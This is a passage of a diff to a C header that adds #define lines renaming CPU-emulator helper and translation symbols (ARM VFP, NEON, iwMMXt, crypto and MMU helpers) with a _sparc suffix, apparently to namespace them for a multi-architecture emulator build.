gen_helper_set_rmode gen_helper_set_rmode_sparc +#define gen_helper_set_user_reg gen_helper_set_user_reg_sparc +#define gen_helper_shadd16 gen_helper_shadd16_sparc +#define gen_helper_shadd8 gen_helper_shadd8_sparc +#define gen_helper_shaddsubx gen_helper_shaddsubx_sparc +#define gen_helper_shl_cc gen_helper_shl_cc_sparc +#define gen_helper_shr_cc gen_helper_shr_cc_sparc +#define gen_helper_shsub16 gen_helper_shsub16_sparc +#define gen_helper_shsub8 gen_helper_shsub8_sparc +#define gen_helper_shsubaddx gen_helper_shsubaddx_sparc +#define gen_helper_ssat gen_helper_ssat_sparc +#define gen_helper_ssat16 gen_helper_ssat16_sparc +#define gen_helper_ssub16 gen_helper_ssub16_sparc +#define gen_helper_ssub8 gen_helper_ssub8_sparc +#define gen_helper_ssubaddx gen_helper_ssubaddx_sparc +#define gen_helper_sub_saturate gen_helper_sub_saturate_sparc +#define gen_helper_sxtb16 gen_helper_sxtb16_sparc +#define gen_helper_uadd16 gen_helper_uadd16_sparc +#define gen_helper_uadd8 gen_helper_uadd8_sparc +#define gen_helper_uaddsubx gen_helper_uaddsubx_sparc +#define gen_helper_udiv gen_helper_udiv_sparc +#define gen_helper_uhadd16 gen_helper_uhadd16_sparc +#define gen_helper_uhadd8 gen_helper_uhadd8_sparc +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_sparc +#define gen_helper_uhsub16 gen_helper_uhsub16_sparc +#define gen_helper_uhsub8 gen_helper_uhsub8_sparc +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_sparc +#define gen_helper_uqadd16 gen_helper_uqadd16_sparc +#define gen_helper_uqadd8 gen_helper_uqadd8_sparc +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_sparc +#define gen_helper_uqsub16 gen_helper_uqsub16_sparc +#define gen_helper_uqsub8 gen_helper_uqsub8_sparc +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_sparc +#define gen_helper_usad8 gen_helper_usad8_sparc +#define gen_helper_usat gen_helper_usat_sparc +#define gen_helper_usat16 gen_helper_usat16_sparc +#define gen_helper_usub16 gen_helper_usub16_sparc +#define gen_helper_usub8 gen_helper_usub8_sparc +#define gen_helper_usubaddx gen_helper_usubaddx_sparc +#define gen_helper_uxtb16 gen_helper_uxtb16_sparc +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_sparc +#define gen_helper_v7m_msr gen_helper_v7m_msr_sparc +#define gen_helper_vfp_absd gen_helper_vfp_absd_sparc +#define gen_helper_vfp_abss gen_helper_vfp_abss_sparc +#define gen_helper_vfp_addd gen_helper_vfp_addd_sparc +#define gen_helper_vfp_adds gen_helper_vfp_adds_sparc +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_sparc +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_sparc +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_sparc +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_sparc +#define gen_helper_vfp_divd gen_helper_vfp_divd_sparc +#define gen_helper_vfp_divs gen_helper_vfp_divs_sparc +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_sparc +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_sparc +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_sparc +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_sparc +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_sparc +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_sparc +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_sparc +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_sparc +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_sparc +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_sparc +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_sparc +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_sparc +#define gen_helper_vfp_mins gen_helper_vfp_mins_sparc +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_sparc +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_sparc +#define gen_helper_vfp_muld gen_helper_vfp_muld_sparc +#define gen_helper_vfp_muls gen_helper_vfp_muls_sparc +#define gen_helper_vfp_negd gen_helper_vfp_negd_sparc +#define gen_helper_vfp_negs gen_helper_vfp_negs_sparc +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_sparc +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_sparc +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_sparc +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_sparc +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_sparc +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_sparc +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_sparc +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_sparc +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_sparc +#define gen_helper_vfp_subd gen_helper_vfp_subd_sparc +#define gen_helper_vfp_subs gen_helper_vfp_subs_sparc +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_sparc +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_sparc +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_sparc +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_sparc +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_sparc +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_sparc +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_sparc +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_sparc +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_sparc +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_sparc +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_sparc +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_sparc +#define gen_helper_vfp_touid gen_helper_vfp_touid_sparc +#define gen_helper_vfp_touis gen_helper_vfp_touis_sparc +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_sparc +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_sparc +#define gen_helper_vfp_tould gen_helper_vfp_tould_sparc +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_sparc +#define gen_helper_vfp_touls gen_helper_vfp_touls_sparc +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_sparc +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_sparc +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_sparc +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_sparc +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_sparc +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_sparc +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_sparc +#define gen_helper_wfe gen_helper_wfe_sparc +#define gen_helper_wfi gen_helper_wfi_sparc +#define gen_hvc gen_hvc_sparc +#define gen_intermediate_code_internal gen_intermediate_code_internal_sparc +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_sparc +#define gen_iwmmxt_address gen_iwmmxt_address_sparc +#define gen_iwmmxt_shift gen_iwmmxt_shift_sparc +#define gen_jmp gen_jmp_sparc +#define gen_load_and_replicate gen_load_and_replicate_sparc +#define gen_load_exclusive gen_load_exclusive_sparc +#define gen_logic_CC gen_logic_CC_sparc +#define gen_logicq_cc gen_logicq_cc_sparc +#define gen_lookup_tb gen_lookup_tb_sparc +#define gen_mov_F0_vreg gen_mov_F0_vreg_sparc +#define gen_mov_F1_vreg gen_mov_F1_vreg_sparc +#define gen_mov_vreg_F0 gen_mov_vreg_F0_sparc +#define gen_muls_i64_i32 gen_muls_i64_i32_sparc +#define gen_mulu_i64_i32 gen_mulu_i64_i32_sparc +#define gen_mulxy gen_mulxy_sparc +#define gen_neon_add gen_neon_add_sparc +#define gen_neon_addl gen_neon_addl_sparc +#define gen_neon_addl_saturate gen_neon_addl_saturate_sparc +#define gen_neon_bsl gen_neon_bsl_sparc +#define gen_neon_dup_high16 gen_neon_dup_high16_sparc +#define gen_neon_dup_low16 gen_neon_dup_low16_sparc +#define gen_neon_dup_u8 gen_neon_dup_u8_sparc +#define gen_neon_mull gen_neon_mull_sparc +#define gen_neon_narrow gen_neon_narrow_sparc +#define gen_neon_narrow_op gen_neon_narrow_op_sparc +#define gen_neon_narrow_sats gen_neon_narrow_sats_sparc +#define gen_neon_narrow_satu gen_neon_narrow_satu_sparc +#define gen_neon_negl gen_neon_negl_sparc +#define gen_neon_rsb gen_neon_rsb_sparc +#define gen_neon_shift_narrow gen_neon_shift_narrow_sparc +#define gen_neon_subl gen_neon_subl_sparc +#define gen_neon_trn_u16 gen_neon_trn_u16_sparc +#define gen_neon_trn_u8 gen_neon_trn_u8_sparc +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_sparc +#define gen_neon_unzip gen_neon_unzip_sparc +#define gen_neon_widen gen_neon_widen_sparc +#define gen_neon_zip gen_neon_zip_sparc +#define gen_new_label gen_new_label_sparc +#define gen_nop_hint gen_nop_hint_sparc +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_sparc +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_sparc +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_sparc +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_sparc +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_sparc +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_sparc +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_sparc +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_sparc +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_sparc +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_sparc +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_sparc +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_sparc +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_sparc +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_sparc +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_sparc +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_sparc +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_sparc +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_sparc +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_sparc +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_sparc +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_sparc +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_sparc +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_sparc +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_sparc +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_sparc +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_sparc +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_sparc +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_sparc +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_sparc +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_sparc +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_sparc +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_sparc +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_sparc +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_sparc +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_sparc +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_sparc +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_sparc +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_sparc +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_sparc +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_sparc +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_sparc +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_sparc +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_sparc +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_sparc +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_sparc +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_sparc +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_sparc +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_sparc +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_sparc +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_sparc +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_sparc +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_sparc +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_sparc +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_sparc +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_sparc +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_sparc +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_sparc +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_sparc +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_sparc +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_sparc +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_sparc +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_sparc +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_sparc +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_sparc +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_sparc +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_sparc +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_sparc +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_sparc +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_sparc +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_sparc +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_sparc +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_sparc +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_sparc +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_sparc +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_sparc +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_sparc +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_sparc +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_sparc +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_sparc +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_sparc +#define gen_rev16 gen_rev16_sparc +#define gen_revsh gen_revsh_sparc +#define gen_rfe gen_rfe_sparc +#define gen_sar gen_sar_sparc +#define gen_sbc_CC gen_sbc_CC_sparc +#define gen_sbfx gen_sbfx_sparc +#define gen_set_CF_bit31 gen_set_CF_bit31_sparc +#define gen_set_condexec gen_set_condexec_sparc +#define gen_set_cpsr gen_set_cpsr_sparc +#define gen_set_label gen_set_label_sparc +#define gen_set_pc_im gen_set_pc_im_sparc +#define gen_set_psr gen_set_psr_sparc +#define gen_set_psr_im gen_set_psr_im_sparc +#define gen_shl gen_shl_sparc +#define gen_shr gen_shr_sparc +#define gen_smc gen_smc_sparc +#define gen_smul_dual gen_smul_dual_sparc +#define gen_srs gen_srs_sparc +#define gen_ss_advance gen_ss_advance_sparc +#define gen_step_complete_exception gen_step_complete_exception_sparc +#define gen_store_exclusive gen_store_exclusive_sparc +#define gen_storeq_reg gen_storeq_reg_sparc +#define gen_sub_carry gen_sub_carry_sparc +#define gen_sub_CC gen_sub_CC_sparc +#define gen_subq_msw gen_subq_msw_sparc +#define gen_swap_half gen_swap_half_sparc +#define gen_thumb2_data_op gen_thumb2_data_op_sparc +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_sparc +#define gen_ubfx gen_ubfx_sparc +#define gen_vfp_abs gen_vfp_abs_sparc +#define gen_vfp_add gen_vfp_add_sparc +#define gen_vfp_cmp gen_vfp_cmp_sparc +#define gen_vfp_cmpe gen_vfp_cmpe_sparc +#define gen_vfp_div gen_vfp_div_sparc +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_sparc +#define gen_vfp_F1_mul gen_vfp_F1_mul_sparc +#define gen_vfp_F1_neg gen_vfp_F1_neg_sparc +#define gen_vfp_ld gen_vfp_ld_sparc +#define gen_vfp_mrs gen_vfp_mrs_sparc +#define gen_vfp_msr gen_vfp_msr_sparc +#define gen_vfp_mul gen_vfp_mul_sparc +#define gen_vfp_neg gen_vfp_neg_sparc +#define gen_vfp_shto gen_vfp_shto_sparc +#define gen_vfp_sito gen_vfp_sito_sparc +#define gen_vfp_slto gen_vfp_slto_sparc +#define gen_vfp_sqrt gen_vfp_sqrt_sparc +#define gen_vfp_st gen_vfp_st_sparc +#define gen_vfp_sub gen_vfp_sub_sparc +#define gen_vfp_tosh gen_vfp_tosh_sparc +#define gen_vfp_tosi gen_vfp_tosi_sparc +#define gen_vfp_tosiz gen_vfp_tosiz_sparc +#define gen_vfp_tosl gen_vfp_tosl_sparc +#define gen_vfp_touh gen_vfp_touh_sparc +#define gen_vfp_toui gen_vfp_toui_sparc +#define gen_vfp_touiz gen_vfp_touiz_sparc +#define gen_vfp_toul gen_vfp_toul_sparc +#define gen_vfp_uhto gen_vfp_uhto_sparc +#define gen_vfp_uito gen_vfp_uito_sparc +#define gen_vfp_ulto gen_vfp_ulto_sparc +#define get_arm_cp_reginfo get_arm_cp_reginfo_sparc +#define get_clock get_clock_sparc +#define get_clock_realtime get_clock_realtime_sparc +#define get_constraint_priority get_constraint_priority_sparc +#define get_float_exception_flags get_float_exception_flags_sparc +#define get_float_rounding_mode get_float_rounding_mode_sparc +#define get_fpstatus_ptr get_fpstatus_ptr_sparc +#define get_level1_table_address get_level1_table_address_sparc +#define get_mem_index get_mem_index_sparc +#define get_next_param_value get_next_param_value_sparc +#define get_opt_name get_opt_name_sparc +#define get_opt_value get_opt_value_sparc +#define get_page_addr_code get_page_addr_code_sparc +#define get_param_value get_param_value_sparc +#define get_phys_addr get_phys_addr_sparc +#define get_phys_addr_lpae get_phys_addr_lpae_sparc +#define get_phys_addr_mpu get_phys_addr_mpu_sparc +#define get_phys_addr_v5 get_phys_addr_v5_sparc +#define get_phys_addr_v6 get_phys_addr_v6_sparc +#define get_system_memory get_system_memory_sparc +#define get_ticks_per_sec get_ticks_per_sec_sparc +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_sparc +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__sparc +#define gt_cntfrq_access gt_cntfrq_access_sparc +#define gt_cnt_read gt_cnt_read_sparc +#define gt_cnt_reset gt_cnt_reset_sparc +#define gt_counter_access gt_counter_access_sparc +#define gt_ctl_write gt_ctl_write_sparc +#define gt_cval_write gt_cval_write_sparc +#define gt_get_countervalue gt_get_countervalue_sparc +#define gt_pct_access gt_pct_access_sparc +#define gt_ptimer_access gt_ptimer_access_sparc +#define gt_recalc_timer gt_recalc_timer_sparc +#define gt_timer_access gt_timer_access_sparc +#define gt_tval_read gt_tval_read_sparc +#define gt_tval_write gt_tval_write_sparc +#define gt_vct_access gt_vct_access_sparc +#define gt_vtimer_access gt_vtimer_access_sparc +#define guest_phys_blocks_free guest_phys_blocks_free_sparc +#define guest_phys_blocks_init guest_phys_blocks_init_sparc +#define handle_vcvt handle_vcvt_sparc +#define handle_vminmaxnm handle_vminmaxnm_sparc +#define handle_vrint handle_vrint_sparc +#define handle_vsel handle_vsel_sparc +#define has_help_option has_help_option_sparc +#define have_bmi1 have_bmi1_sparc +#define have_bmi2 have_bmi2_sparc +#define hcr_write hcr_write_sparc +#define helper_access_check_cp_reg helper_access_check_cp_reg_sparc +#define helper_add_saturate helper_add_saturate_sparc +#define helper_add_setq helper_add_setq_sparc +#define helper_add_usaturate helper_add_usaturate_sparc +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_sparc +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_sparc +#define helper_be_ldq_mmu helper_be_ldq_mmu_sparc +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_sparc +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_sparc +#define helper_be_ldul_mmu helper_be_ldul_mmu_sparc +#define helper_be_lduw_mmu helper_be_lduw_mmu_sparc +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_sparc +#define helper_be_stl_mmu helper_be_stl_mmu_sparc +#define helper_be_stq_mmu helper_be_stq_mmu_sparc +#define helper_be_stw_mmu helper_be_stw_mmu_sparc +#define helper_clear_pstate_ss helper_clear_pstate_ss_sparc +#define helper_clz_arm helper_clz_arm_sparc +#define helper_cpsr_read helper_cpsr_read_sparc +#define helper_cpsr_write helper_cpsr_write_sparc +#define helper_crc32_arm helper_crc32_arm_sparc +#define helper_crc32c helper_crc32c_sparc +#define helper_crypto_aese helper_crypto_aese_sparc +#define helper_crypto_aesmc helper_crypto_aesmc_sparc +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_sparc +#define helper_crypto_sha1h helper_crypto_sha1h_sparc +#define helper_crypto_sha1su1 helper_crypto_sha1su1_sparc +#define helper_crypto_sha256h helper_crypto_sha256h_sparc +#define helper_crypto_sha256h2 helper_crypto_sha256h2_sparc +#define helper_crypto_sha256su0 helper_crypto_sha256su0_sparc +#define helper_crypto_sha256su1 helper_crypto_sha256su1_sparc +#define helper_dc_zva helper_dc_zva_sparc +#define helper_double_saturate helper_double_saturate_sparc +#define helper_exception_internal helper_exception_internal_sparc +#define helper_exception_return helper_exception_return_sparc +#define helper_exception_with_syndrome helper_exception_with_syndrome_sparc +#define helper_get_cp_reg helper_get_cp_reg_sparc +#define helper_get_cp_reg64 helper_get_cp_reg64_sparc +#define helper_get_r13_banked helper_get_r13_banked_sparc +#define helper_get_user_reg helper_get_user_reg_sparc +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_sparc +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_sparc +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_sparc +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_sparc +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_sparc +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_sparc +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_sparc +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_sparc +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_sparc +#define helper_iwmmxt_addub helper_iwmmxt_addub_sparc +#define helper_iwmmxt_addul helper_iwmmxt_addul_sparc +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_sparc +#define helper_iwmmxt_align helper_iwmmxt_align_sparc +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_sparc +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_sparc +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_sparc +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_sparc +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_sparc +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_sparc +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_sparc +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_sparc +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_sparc +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_sparc +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_sparc +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_sparc +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_sparc +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_sparc +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_sparc +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_sparc +#define helper_iwmmxt_insr helper_iwmmxt_insr_sparc +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_sparc +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_sparc +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_sparc +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_sparc +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_sparc +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_sparc +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_sparc +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_sparc +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_sparc +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_sparc +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_sparc +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_sparc +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_sparc +#define helper_iwmmxt_minub helper_iwmmxt_minub_sparc +#define helper_iwmmxt_minul helper_iwmmxt_minul_sparc +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_sparc +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_sparc +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_sparc +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_sparc +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_sparc +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_sparc +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_sparc +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_sparc +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_sparc +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_sparc +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_sparc +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_sparc +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_sparc +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_sparc +#define helper_iwmmxt_packul helper_iwmmxt_packul_sparc +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_sparc +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_sparc 